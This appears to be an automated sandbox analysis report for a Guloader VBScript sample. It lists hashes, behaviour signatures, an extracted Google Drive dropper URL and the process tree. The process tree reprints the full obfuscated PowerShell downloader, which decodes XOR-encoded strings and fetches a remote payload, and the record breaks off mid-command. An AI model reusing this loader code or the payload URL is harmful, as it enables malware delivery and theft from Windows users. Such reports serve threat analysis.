Analysis

  • max time kernel
    71s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-02-2023 11:29

General

  • Target

    transferencia.....vbe

  • Size

    60KB

  • MD5

    880b795347b76a1660b3dfcae7bc28f7

  • SHA1

    dd398c1781ddd4f3e69036f4dadde6c643cacd44

  • SHA256

    c1435f8fc9a6ffb253811a74d4016f73248b7226d6d5b458c3bf960ee3a38005

  • SHA512

    e3ff92ca5ed3cc63bd8e1213a79dfc2574e0e39a126ece3d5890062eccc56ba23efe8f4301e71e3ad1fd3b1f88f9253e8d16d3fe0b73d5e78530f25cd80a7ccc

  • SSDEEP

    768:FlRe1yyO99pKzl2VT1Gxxy4tH/dD/ASEGZU2L7Y+yk10iGfzi945EriK:F3GyvLpylJxdfawKQNVMErd

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1dzg1926pnDm935d_Cm4TREqzX4j7oxJl

Signatures

  • Guloader, Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 2 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\transferencia.....vbe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\System32\cmd.exe
      cmd /c echo shell
      2⤵
        PID:1636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ligh = """BlFUfuHanNycButVoiSaoSpnOu MyHFdTUbBSv Sv{Sk Vt Sp Af SkpSkaPrrOsaHomTr(Su[NoSEntBarLyiSpnNegLe]De`$BeuFoeTigKvePsnFonImyAdtOftKuiPh)Ud;me Ak`$KaECikGesShaHomUn Ki=Sy es'Pr'No;Ki UnWTrrFoiFatMieLo-GrHEuoBosNutSt Pa`$ciERnkUnsUdaImmFe;Ca BeWCorMaiSetPleMu-SpHUnoGesEntLo Ru`$WeECokCesAcaSpmMa;Fo SkWSyrMaiaftDoeUr-SkHOpoSksPltpr Ad`$CaEMekAlsShaTamUd;In Si Si Di St`$FlUSonsehdiaWasTitMaiLs Fi=Ce VeNCheBrwSt-tyOPrbAfjBreEncBltdi LibSoyArtBaeSp[No]No To(Ca`$AnuEveFagQueDenAvnAlyDitArtShiSe.MeLAreMintegHotUphOv Fo/Mo Fl2Br)Pr;Ta Fo Io Ko WiFPioPorAs(ni`$AmMGeePlnPadGeiSpcanpNilFiaTinBatLa2Ov1Du6Sl=Hr0Te;so fa`$FoMPleOrnKodToiOvcKrpTalpeaBanPatCh2Bo1Di6Se Ca-DolBrtsi sy`$GuuMeeVagUnePandinHaysmtFltTaiQu.ArLAreAfnTigbetUnhSe;Op ma`$beMFaeLinPrdMoiTucBapSelTrahanEgtub2Ly1Ak6Sy+Un=No2Di)um{Ar So Is Om Sp Sk Ra Tr In`$haUTanSahUhaAgsThtUniIn[Ha`$doMSteKnnBodFoiTucImpDilsvaRanBitho2Ph1Br6Fo/Ol2ta]Be Fe=Ma Ok[KucGroDinMivBreCarVitAc]In:Up:FrTHeoBaBReyMitKoeJe(ba`$AkuSkeSkgAueTenOunEkyMitRetEuiNo.OpSSluBebFisAgtHirGoiHynTigTr(Un`$UsMgreunnVedHeiSncBrpSelDraAvnGotNo2Oa1Jo6To,Na Bo2Sk)Ti,Ka Gr1Fo6Ba)Kv;Th St Br`$PeUEjnWhhThaChsHetSpiEn[ri`$SpMSieBrnTadAaicacDepTylUnaGanHotDi2St1Ba6An/Ul2Pr]De Ne=Lu En(Hy`$TrUPonEahWiaFlsOttNoiSu[Mg`$TrMBeePlnRedKuiSkcRepBulSuaApncatFo2Ov1od6Un/Ti2St]Es Se-HebUnxFloArrCh Di2Re1Kl0Ka)Wi;ae Ge Be Ru bu}Su Ro[CoSSntNurHeiSpnPrgHv]st[PnSYoyDesBetUdeAumBr.EqTDieTexSktEl.TiEVanRucGroHodOmiAtnBigUh]In:Su:GeAprSTrCCrIPeISl.FuGMieJutInSRetCarFoiAnnHygPu(Th`$FrUPenMuhOxatisJitDeiNo)fy;Sv}Ex`$SapBaobilFraGgrBaiBlsCoaCatSmiUd0Br=MyHGeTBaBIf Kr'Da8Re1MiAChBUuABe1DuAPe6EdBCo7LoBReFSnFTaCTeBCe6PiBHoEudBReEKl'Ov;Si`$BopAuotolSoaVirLliBosBiaJetSkiAu1Go=PiHOpTOsBBo 
Eu'Ko9TeFPrBGeBBaBHv1OnASe0ToBUsDAgASi1MiBSmDcyBRe4StABu6PuFJaCSo8Ar5HaBTeBViBReCMoESu1ReESy0FoFnaCVi8No7DiBMeCBeATe1YeBHu3MiBDe4FlBMu7So9VeCOcBFl3reARe6SaBBrBPrAPr4stBBr7Sa9TrFTeBUn7SoAag6NaBKvAAsBChDBaBCu6spAUl1An'Sa;As`$UnpCroBrlOpaRerOpiTosFiaEntLeiDe2An=ReHhuTReBhu Au'Ch9Th5AfBTh7SiAMi6ko8Ga2OrAMi0TiBCuDKnBOu1Ud9To3MiBba6BaBRe6TeAFr0TaBOp7ElAVa1PrAAl1Br'Mi;sp`$BopIdoUnlInaCarMaiMesKaaUntLeiAu3Va=SoHPeTBeBMi Fl'Pe8Hi1StABrBOuAje1hyALe6MoBGu7unBReFNoFLyCGo8Eq0FaAef7UdBFoCsaAVe6toBGrBPaBstFPrBba7BeFInCDe9SlBStBFaCTrAIn6NoBsk7PlATi0ScBLoDMaASh2Sa8Ti1AnBNi7WrAun0deAHy4PrBAlBMiBAn1OvBOr7AfAop1AdFFoCAb9InACaBDi3VaBClCPhBlo6MoBRoESjBUb7So8Ma0BuBRo7ArBFi4Do'Tr;Gl`$IlpCroSulDraAkrDiiloslgaPrtFoiEr4Ko=SkHTeTToBNe Sk'ugAPo1leAPr6TaATe0InBDeBGoBDeCdrBEn5Pe'Sp;Ev`$DepScoCalRaaKlrTaiNisSkaOvtTuiDe5Be=BaHCaTTiBIn Sc'Ri9Bi5HoBEs7BaAPh6pa9BeFskBNoDChBTe6DuAPh7RaBBlERoBCa7Ab9SaAKaBMi3ImBkrCElBWa6AbBprEudBAl7no'Un;Ph`$StpMeoUnlDeaVarReiPrsTraOutvaiEx6Fl=PlHprTKoBIn Li'Py8we0Du8Vr6Co8Oo1NiAOl2UnBBl7MaBCo1HeBsuBunBmu3luBSpEzy9FjCSpBBe3SvBAtFEvBTu7TiFAfEReFJo2Su9ZoAKaBSeBInBOm6ThBLi7Sk9ri0CuATeBVa8no1FoBFyBMoBUn5CoFDeEBaFPe2Th8Bu2LeABe7UnBGu0RaBTeEPnBFoBpiBBa1Aa'Ja;un`$SepDiokalSpaRirFoiCasPraVatStiMa7ca=PaHInTFsBSn Ra'Om8No0EmAWa7HyBMoCBaAIn6avBPaBAaBMaFTiBDr7LiFCoEGrFPo2Ma9SeFaaBHi3FoBKlCAfBLa3MaBpe5DiBTr7FoBHo6ga'Ko;Hy`$BrpSkoSalFeaAbrCliStsBaaPltMiiPr8Ba=ReHYaTKoBIn Re'Sy8Dr0LyBSc7ReBUv4zoBBeEbeBNr7KoBGl1CoAOs6EfBPl7ReBPh6Ak9Pr6FoBJu7KuBTaEAqBUn7BuBSt5GiBSi3HeAKr6GyBRe7Ta'Fi;sg`$bepTooColSmaUnrYdiGasToaCatEniBa9Ar=SaHTeTVrBPa Ag'Ls9VuBMoBNeCAd9heFCoBCh7ScBGiFafBAfDPiAFu0MiAReBGi9SmFPeBRaDInBTy6MeAUn7afBTrENoBFa7Fu'te;St`$KrYbiaOprAldPeiSt0Ri=VrHWoTStBMa Ka'ni9GaFFoAskBBl9Ma6StBGr7CoBTeEEkBLe7MeBst5PaBBu3BiADr6CoBDe7ka8Gl6KaARhBMuARe2DrBTe7Te'Au;In`$UlYTaaAdrKadSeiBr1Cr=TaHHoTGaBKv 
Ga'Zi9Bi1wrBMiEUnBCl3AfASc1CiAve1FiFOvEReFRi2an8Po2SlASu7MuBBv0PhBpeEduBFiBpeBMo1DiFChEGuFGy2El8Ti1UnBOn7AtBAs3InBKaEAcBGe7UdBWe6BiFEfELoFGt2mi9Wh3kuBPrCOvAHe1AfBBrBUn9Re1FaBLoEShBDi3GrAJo1ViAVa1HoFtrEFiFDe2Gi9Da3PaASk7HaATi6OoBUnDBl9Id1EnBtuESvBOv3OvAin1InAPa1Fa'Re;Ag`$KrYbraVerkrdreiSk2Kr=AvHReTSeBun ca'Dd9StBNeBBaCDiAPr4BrBfiDVeBEd9PsBDi7Ma'Er;Pr`$StYDaaMirRedBuiPr3Ko=AbHAcTpoBHo In'St8Gu2LrATo7PrBTe0ClBInEStBBaBRiBOv1ReFNyETrFVe2Gu9FoAReBUdBAvBki6DiBBy7No9Ab0FaADoBSa8no1AnBUdBReBUn5whFJaEAdFIn2Bl9PlCUnBTi7AdALi5So8Bu1BrBUiEprBMyDMaANo6UnFFuESeFfa2ud8Ou4QuBMoBSeABe0MaAeb6TaAVa7TuBVe3VaBPaESe'Ec;In`$SlYAtaClrAudMaifo4na=EsHBeTlaBDe Je'Tr8De4SeBBlBUnANo0ReAAr6FeAPa7AnBMi3PrBBeETo9ko3SqBReEPuBUnELiBFoDSaBMe1He'In;Ca`$ApYPuaAnrCodFriMi5Un=DiHMoTHaBAc St'JeBBeCBiATo6AdBCr6BeBciEOrBNoEen'Id;Mo`$SlYCraAurTodCriAf6Em=FiHDoTVaBMa Un'Pa9ByCUnASk6Au8Sa2JuABh0SuBBrDvaAFa6KoBLo7OpBUd1BlANo6fl8Wo4FaBSaBPeAZo0kaAAb6MuARe7ShBAl3jaBToEPh9ArFMeBBy7AfBHnFFiBSpDDeABu0SkAApBtp'Ho;Ba`$BeYLaaAdrHydFeiIn7St=UdHOrTEfBSp Tr'gn9MrBDe9An7sp8ReACo'Da;Is`$UpYMiaUnrIndRaiDe8Un=CiHFoTOeBZe Tr'Pe8UpEDu'Se;Db`$LiRFeuoubLnePefMoatocSotst=AnHVeTFoBAf Bl'Sa8Be7In8Ch1In9Or7Re8ci0HeETa1AsELe0to'Pi;Fo`$BrOafvFeeBerScpSp=TeHmeTGtBFi Ce'Dr9Bi1PeBMo3GeBApEUnBSpEir8Co5FrBSmBCiBGeCFeBSa6FeBPaDMiAkr5De8La2MoAAd0NoBChDUnBIm1Co9Ku3Un'Re;difPeusunEkcJotDaiDeoSlnBu FefUdkPrpGi Fr{PhPDeaDerAkaLamCo Sk(Sn`$VeDCheToyunsGroBosRapPo,Fl Pi`$HyETemLiaTwnFeaBetBoiEmsDi)Pa Un Un ra Hy Di;Ni`$UnvDiiUneWatHa0St Co=UfHTiTEkBMi Fo'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'Ko;Ma&Ba(Ge`$ErYReaTrrindAkiTa7Fo)Lu Se`$MivMeiGleUntBr0Sk;Te`$BavPaifreRatUn5Tr in=s OpHBoTDoBMu 
Mi'ScFVe6Ma8Ki1TeBMo9SeAPu0LiBMiBGrBSa6HaAMu6ReFGr2ReEFaFMcFla2NuFDe6Po9ScAJeBRa7ReABaAEsBEu3alBGe7unFOsCFi9hv5RiBCa7TeAFr6Cr9ReFVaBBo7ToAVi6BoBOvAEtBthDMiBMo6PeFEnABeFSt6UdASo2AnBMoDKrBReEDcBSt3MaAVr0DeBDeBFiAHa1FlBSt3MaASt6PrBPaBTvEPr0PlFHoEUnFRe2Pa8ds9Vo8Sg6OpAjoBStAHe2LaBat7Va8No9Ro8MiFSy8MaFheFFa2Un9Rr2OxFSpABaFAb6AbAHo2MoBHeDSlBHaESaBBe3ClAti0LuBSeBUaADi1HyBRi3VeAFo6AnBBrBSuEBl1BlFWaEFrFRe2InFBu6SaApe2CoBDaDFrBphEAnBUd3FiAIs0BaBtiBunAFi1BoBHu3AsAPl6CaBOnBOtEBr6OmFDeBGiFUnBSp'Ta;Se&Un(Fa`$DiYCoaUdrJedHyiSu7Tr)Lb Mo`$TevSqiLoeActLu5Da;Af`$tevPeiSaeNetDe1Ef Un=Gl FoHamTBdBMa Li'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'Mo;Du&Bo(br`$SaYreaPrrvadUniUn7St)Qu po`$EnvRaiHoeMetEq1fi;Im}AcfBauRvnDicPrtGgiDaoVinPu AtGPiDBuTOu Fl{HoPOpamarPoaInmGr cu(Nr[FlPIsaGirSkaAsmNyeDetDeetirBi(UsPEloCysanitatBaiFuoArnMa Pr=Av Ka0ba,St ByMToaBunUddcaaHetUnoMarDiyOu Tr=In Le`$UhTTerfruSeeMa)En]Ko No[SpTMayEppCoeKo[Tr]Ud]Al Jo`$ChPCaeUrnSasVaiMeoSenUn,Lu[SkPSvaAlrUbaClmReeBrtGaeDirMs(JoPLaoFrsDoibltAmiEmoHjnMi Or=Gu tr1No)Ho]No Ha[inTReyblpSreUn]Ov Le`$OmMGreBlnBrdEgiOpcCa en=Wa Me[MiVTaoTwiShdRe]He)Co;No`$MavopiReeFatNo2Fi Sk=Ju LeHMiTAnBHj 
Co'NeFAb6Ge8Ga0KiBFo7BeAOb1EpATr7BoAja0AvARe0VsFBr2VdEJoFFlFPr2In8Sa9Sy9Pa3IbADa2ByASt2Va9Vi6BiBCrDreBRuFcoBUn3SnBBrBMaBFlCSf8tuFshESu8DiELa8Fo9Fe1FiAPr7AiASu0UnAWi0JoBCr7piBScCarAKl6Di9St6ElBNoDSuBTiFalBSt3EdBFrBCaBUnCArFInCBi9Ic6PhBBi7crBtr4KlBBeBFdBMoCGuBpi7Sk9St6PoABeBUvBLaCgaBRe3spBSpFclBReBJiBDe1Fo9Mi3BrAAn1HlAJo1UnBba7CoBEkFJuBBi0BlBHaEsoAHoBBaFPrADrFkoAFe9LaCKrBPr7DyATa5AbFStFAl9MyDMaBCe0PrBId8KaBUr7SpBBr1DyACo6AfFEx2Nr8Sa1AlAViBSkAFl1KnANa6InBUn7FrBPlFBuFBeCKl8Na0LeBFo7ReBPr4GaBPlEAfBNe7PeBLi1ReAOu6GaBBeBSeBByDSuBFaCFoFSoCUn9Op3SkADm1LyAIn1soBSp7FiBOmFBeBMe0ExBUnEOxABlBPl9ScCAnBIn3ApBHjFDrBBe7CrFSuALsFSj6CrADo2LaBHyDEuBOpEElBBy3HoAun0SeBHjBseAAd1SpBSh3JeAMo6klBFhBNeECoALaFUnBSiFFeBbuFTaEMiFVa2ta8br9Di8mi1inABaBAnAKo1BdARe6BrBPr7ByBSuFafFSuCAc8Ra0AkBFo7KaBFg4OvBSaEScBBe7BlBEl1HaATa6YvBDeBUdBFnDHaBbiCAbFFaCCl9St7CuBScFImBdeBKoAFa6drFAnCLg9No3riALe1DiASk1KrBun7ReBChFAnBUn0RoBUnEHeAUnBSo9su0CaAUd7UrBPaBOmBKaEFoBBu6UtBHa7ThASe0No9Pe3UnBen1UdBTr1BoBWo7boATe1peATi1co8SeFMiEAu8MiELo8Hv8br0FoAch7teBDiCDrFssBUnFAwCFi9St6AvBCh7BaBSo4WiBSuBPlBReCReBRe7Ny9De6AcAOmBDoBFaCMaBIn3PiBFuFlaBLoBPoBSp1Ma9NoFJeBAlDChBIn6DiAPa7BiBSmENoBBe7TrFPaAByFRe6OpAFy2SmBDeDKrBCaEMeBDa3FrAKr0AcBJoBTrAHy1AbBAx3SuAIs6suBPnBOvEGaBHeFbrEExFgl2SkFto6SuBek4UnBCa3TiBNoEGlASy1ChBDe7ToFFoBFrFBaCEd9Ts6BoBka7BiBde4AsBUdBOvBTiCLiBkl7Th8Sa6FoAStBCaANa2ViBSp7OmFKrAMaFNi6Th8BrBSkBSv3StARy0AkBNu6BiBSmBOuEDe2MeFStELiFTr2AdFTi6Pa8BaBRiBTa3HoATr0seBRa6ReBskBRoEKk3FeFRaEFoFSa2Ha8Im9Ov8me1ShAViBLeAPh1FoAUn6BlBSt7KvBcoFloFDeCFe9UnFDeADe7TrBAfEmiACo6inBSuBTrBMi1HeBBl3GuAPe1BuAWh6Ar9so6EnBWo7GoBWrEkoBAv7meBsh5PiBSt3PaARe6BuBPr7In8SaFAfFOuBFi'Ti;In&Fa(Ud`$UlYGraChrgadapiRe7Br)Lo mi`$NevVeiOmematBr2Ma;Cr`$BovHuiSlePhtMi3gu Li=Af SaHNsTTrBRi Fr'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'Gr;Vi&Pu(By`$PiYUnaIlrsadBeiBe7Sc)An Ri`$TivCoiVgeCutCl3to;Sa`$SpvfoiMoeKotPl4An Or=Be PrHNoTPeBBa Ku'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'De;at&Ve(Fo`$PlYOmaazrStdReiko7Tr)Ko 
Ou`$HavGeihoeDatdi4Ao;Wh`$BavMaiHyeFjtqu5Th Sa=La StHPoTErBHa Aa'BlASk0FoBSl7UnATr6SoADi7heAGe0DoBUnCDaFFa2TeFSa6Un8Hj0FoBKl7VeASu1AdATo7LaAKe0RoANa0BeFPrCIn9Tr1LaAAc0KiBAm7OuBAp3StAin6MaBDe7In8Mi6SvAPaBUdAEx2NaBUd7SkFMaAArFAsBKl'Pr;Hu&Em(Su`$SkYEsaCerThdSoiHy7Sa)St da`$SovVriNyetrtMt5ab Ov De Ma;Kn}Me`$MaMCooSpnProcogHurDoaFimSasSn Gy=Pa SuHInTUnBCu No'InBPi9CoBMa7OrABr0MaBSoCKrBLi7PrBLsEHeEKa1PhEOm0Ll'Su;ko`$BevStiPieGutUd6Wa Ke=Ti SkHStTRiBFr Pr'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'Uf;Do&Ve(Ox`$afYViaStrHadTriTi7Fi)St Ny`$CovBeiRyeAutLi6De;Me`$CaTPawBriBucLakMapChlFouAb Su=Ha StfOvkFipSy Mu`$StYGlaSarIsdsaiUn5Dr Tr`$UnYUnaHerShdBoipa6Re;mo`$OpvPaiNeetytHa7St Re=Mi tuHToTFiBFr Di'TrFAd6So8In0UnBGl7LaAUe1MuAFe6stBDe7SuELi1SiFUn2KnEReFMoFIn2FlFTa6VaAGr1ReBSa9KoAPa7MlBBr7JoASp1SpABu2SeFSyCPr9LeBYtBThCRaADi4UnBChDShBHa9BoBPo7CoFUdACo8Me9Id9SyBPrBThCNeADa6fi8Co2TrABr6UnADe0Ci8FoFHnESi8GrEMa8Gr8Va8FiBSt7BdAGe0KrBSpDHoFUdEhuFFi2FrEMa4brEGe6FoEaf3ReFStEVaFBo2ChEma2SeAReAEnETu1GaEEk2SkESv2InELy2PhFRoEUnFEg2TeEOv2MaABrAPrESo6MoESy2AfFBaBTu'Cr;Pe&ar(br`$BeYFraanrAndDoino7Tr)Or sp`$HovPeiCaeGetVr7Fa;Re`$BrvFriBieHetSt8No Re=Ka UnHDaTMoBRu Sp'PiFTr6Re8An0SmBKo7ReBPe3PtBSrEStBBl0AnBSy7SvBHy6dyBNe7SlBSeFHoFst2PeESiFSyFSk2VeFSn6HuAIm1PoBIv9AdADi7BoBCa7AdACo1FoAMe2VuFFoCcr9AnBDoBTrCarAMo4PuBVrDLiBWe9KoBPl7LeFHoAFo8Ja9Bo9PlBErBNeCViABe6El8Kr2FoANo6HyABr0Bo8HeFRiESa8UnETr8Ps8Re8CoBDa7MaAQu0SeBKrDOrFNoERiFKv2ObEEe4KoEAl7PaETr0VaEBr6GlEPu3SuEMo2SyEKaASuERaAAkFSoEkuFRu2SkESi2FaAtyAPrEWh1GrESl2GaEHd2OcEud2DiFBrEHaFTh2DeEUn2AfAEfAraEMa6GaFAnBRe'Ha;Fl&ko(Sa`$BaYSnaBirPrdHeiSk7Ha)Ba Fl`$VivBaiMeeSvtJa8Io;Sa`$YaSIttOvrEvmTreTrrBaeSlnDisKa1Mi3Al9Bo0Br1Bi Me=Un Nr'InhTitgatWipSksKu:La/ac/TrdCerIniSuvWoeOp.SagHyoOnonagSelVeepa.IncDeoBlmno/InuSpcPi?MeeRaxgaprooNorPrtWh=IsdFooHowConUnlSwoseaHvdTe&PriindAg=Bo1SpdTrzAigRe1Hy9Mo2Bo6mepbenMaDFimLe9Je3An5MadSe_DrCOpmVi4apTBlRDrEReqDazGuXBr4KljHa7SuoSlxInJsilKo'mu;Ju`$miSNitTirInmSheAnrNaeHanStsjo1pe3Sw9Ta0He0Ha br=Ha UnHNoTKaBKo 
He'IcFRe6Br9NoDhaATi4HaBDe7FiACo0ChAEx1foABu2CaBSe7FoBFeCHaBne6KoBDe7SyFCa2InEAtFMoFUn2AmFPoAss9GrCWaBpr7StARe5KaFPiFAf9UeDSuBDu0SaBWa8BiBHe7GoBBe1GlAFe6ToFMa2Wr9raCReBUd7TrAgr6CaFGeCal8Cl5LeBBa7ClBAl0rh9So1SyBLuEHuBSmBpaBKi7SpBafCSkAKo6AnFGeBSkFBeCPe9Bi6SnBTrDDeABo5InBMiCAsBDrEEnBKaDTyBSu3AdBCl6Fi8Ne1KaAPr6FiAIn0MaBMaBSmBSkCUdBCu5SyFdoAInFCy6Bi8Ex1agAUn6huADa0SpBCoFPaBIn7HeAsn0jaBFo7UdBSwCSkANa1WiEGo3VaEPa1AmEInBDeEHa2ThESa3SkFlaBBu'Ne;Ta`$ApvPaiFoeFotsm8Ph Sw=Av KaHDrTTiBPy As'TrFja6Pu8Du0SmBim7KvARi1FaASu6enBPe7MeEBi0CoEChFUnFIn6AvBRe7SkBViCBiADi4CyEUn8AfBVo3FuASp2ElAPh2EmBVe6ReBDk3IsATu6StBPr3Fo'sk;Co&St(Ka`$SaYChaKorChdBuiFn7He)se Wa`$cavraiTaeArtFr8Vr;Bi`$ByRLieDesKatReeSo2st=Tr`$LeRAteHesEntBeere2Su+ba'Kr\NoACapUdoKosUntGeiColUdsMo.KodMiaNotBo'ch;Be`$TaOEkvNueInrHysRapWaeTrnAadFaeSt=Ko'fi'Aa;BeiKrfSa le(Su-SpnHuonotAm(NeTKueCcsLetDi-KoPCraChtRohMa By`$fiRWaeVisoptTresy2Ud)gr)Be Un{SmwFrhPsiDilGreAv Fr(Va`$UdOTrvNyeRirAlsTrpAfeStnPadSoeTo Ld-MoeChqLa An'Sn'Va)Bd Es{pa&Bi(Pe`$LiYlaaAsrCudAfigr7Or)Ek Ma`$AfSSetForkamSeeArrLaeKanUnsBu1Sy3Im9ce0Ae0hu;AlSBotSlaParbatCi-InSBalUseTreBepVo Se5In;Fo}DeSReeSotCo-StCAsoLgnEltKaeStnpltCi Fo`$EmRUdeAtsbetBoeca2Bi ha`$PrOPivScefarPosCapOpeScnUbdPreSa;Mo}Ga`$LoOCavhueNarSmsMapAteFlnUndReeBr Ko=st snGMaeOrtSt-FrCLaoPlndatKreOpnLetVa Dr`$EkRMiePhsHatIneSe2Be;Op`$QuvTeiAneNstBe9Io Po=Ki UdHStTTrBHu ba'BuFPe6PaARy4OtBVeBTuBOn7BrAOs6DoFsl2AbECiFPrFAn2Tr8He9Pe8Sv1SkALeBLsAAr1AbALa6BoBSo7ReBKeFbuFBlCOr9Fo1UhBUpDDuBDiCSaASy4OoBRe7BrARe0ScAOp6Ki8ReFHoEFo8InESc8na9Pa4UnABl0UdBWlDDoBExFDi9St0DeBFr3FiAUb1biBEl7RaERe4riERe6Mi8Aa1AlAEu6BuAHe0KyBSiBUnBSlCDaBDe5OsFAfAZiFIn6Bu9MrDCeAUd4PaBSp7UnAHa0TiARe1reAAl2SiBFe7HaBUnCGaBDr6kuBFr7InFAdBJo'Pe;Re&Ta(Ri`$ceYHyaTvrcadViiSp7No)mi Un`$ThvWeiSoeSttFo9ko;un`$inORevEveKarelsBapInePanHadBieSa0Fi Sv=Fr waHmuTOlBSt 
Ud'Ni8Ov9Ko8Tr1TrAsmBDiAan1UnADe6NoBSv7EtBMeFCaFOvCPr8Ex0grASn7DiBElCUnAEx6brBBeBWiBSuFLoBSt7StFNoCSy9NgBLyBvaCChADo6SwBEn7SuASt0LoBbeDUpAAn2Po8Ac1ChBRe7prAMa0PrAIg4CeBUnBBaBUn1ovBGa7PrAUn1DiFbrCDe9unFTiBTr3UpAPr0RuAHa1KaBKnAHaBBi3BoBObEre8HaFReEAu8ZeEfe8Od9Re1AsBbeDGrACo2WaAOfBOdFHeABrFBe6KoASl4AmBCoBSlBSu7FiAUn6BaFCaEUdFmi2HoEUn2LeFDeEAfFSk2EnFFo2TaFRe6Th8De0CyBTw7HeACo1HiAWo6SeBhu7PeEKn1GaFAeEEpFVa2BiECa4PeESt6ToEPa3CaFleBVe'No;Ba&En(Pi`$BoYSuaForSkdSuiBe7Am)Er No`$giOJovVoedurtrsBapOeeAunWodfoest0En;Sl`$PhHNeiFeeCrrKn1In4Ve7Ti=Af`$LyvTriVaeMotFe.SacOvoGuuVinlatUn-Co6Pa4Fo1Sa;ps`$trOBavReebarEgsJipPeeGenstdUnedo1Br Hy=Sw SeHJoTEnBTi Un'Un8Ha9Ce8Mo1UnAKeBKnAhi1SrAAn6PrBOr7OvBStFboFWaCsp8Ex0MaAFi7fiBRuCReAFl6OvBReBCoBPeFdiBTa7HeFSoCBj9OpBGaBReCKrASe6WaBHa7MaATi0UnBBrDMuABr2Di8Pr1ShBHy7UnAGe0LeAun4StBKoBreBTi1SiBTi7FeAWr1UhFveCJr9VaFLiBSk3SpAAf0guABl1heBLoAExBDi3BiBSyEGu8DiFBeEsa8ToEPr8In9Op1LeBKaDToARe2PrADiBInFEgABaFFo6HaAUn4EcBTrBDiBCl7StAPn6EpFUrEUnFUn2EqESp4NaECe6InEgo3DaFsoEWiFSu2StFGo6De8Mi0SaBTr7BiBQu3PrBMaEPrBfi0SaBUn7trBsp6StBTr7AbBskFYdFOxEjaFCh2VaFFu6Sy9SoAEkBSoBKoBRu7SpAEn0CaESp3opEDi6AaEFo5DuFFuBVa'tr;Si&Sa(Sl`$QuYAcahorDidStiSo7Un)Bi tr`$meOEnvdaeHirBrsUnpYaePrnFydokeDi1Un;Bi`$HaOBrvAdeperfasCapMieLinSudRieSy2Co Ke=Su ExHReTVoBGe Se'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'Cr;Ge&Bo(Jv`$OuYOvaHorTudSiiOp7An)Un Sk`$SuOpavDoeMorCasBopDeeTrnIndGleIn2Fo;Fr`$hyOSmvSceParShsUnpHoeTenEmdVuePa3Fr St=Pa UnHFoTPaBTa Si'LaFDe6Im8Pr1BaAse6UnAek0KaBKaDBrBBi5stBco3ViFUdCCo9BoBFaBEtCspAad4HaBUnDUnBAu9DoBCo7OvFIdAAcFOf6Ha8Ca0ilBAf7MeAOp1ToAUn6FuBba7PrEFo1AlFDuESrFFo6Sm8Re0coBTe7AnBEx3FlBLaEReBUn0InBUp7AgBLg6FrBMa7AdBHeFNyFSoEPrFRo6Fr8Br6PaAMo5ExBOvBStBdr1AkBRe9KiAIn2HoBRaEFoAAu7AkFReEMeEDu2StFOcEShEVe2PrFInBUn'Th;Gl&Me(Di`$ReYInaParRadbliAs7Un)In ve`$ToOBrvFoeWarKosSepvaeThnXvdMieCa3Ka#St;""";Function Overspende9 { param([String]$uegennytti); For($Mendicplant216=2; $Mendicplant216 -lt $uegennytti.Length-1; $Mendicplant216+=(2+1)){$Strmerens139 = 
$Strmerens139 + $uegennytti.Substring($Mendicplant216, 1)}; $Strmerens139;}$Bortska0 = Overspende9 'CaIGdEExXPr ';$Bortska1= Overspende9 $Ligh;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Bortska1 ;}else{&$Bortska0 $Bortska1;}"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$uegennytti); $Eksam = ''; Write-Host $Eksam; Write-Host $Eksam; Write-Host $Eksam; $Unhasti = New-Object byte[] ($uegennytti.Length / 2); For($Mendicplant216=0; $Mendicplant216 -lt $uegennytti.Length; $Mendicplant216+=2){ $Unhasti[$Mendicplant216/2] = [convert]::ToByte($uegennytti.Substring($Mendicplant216, 2), 16); $Unhasti[$Mendicplant216/2] = ($Unhasti[$Mendicplant216/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($Unhasti);}$polarisati0=HTB '81ABA1A6B7BFFCB6BEBE';$polarisati1=HTB '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$polarisati2=HTB '95B7A682A0BDB193B6B6A0B7A1A1';$polarisati3=HTB '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$polarisati4=HTB 'A1A6A0BBBCB5';$polarisati5=HTB '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$polarisati6=HTB '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$polarisati7=HTB '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$polarisati8=HTB 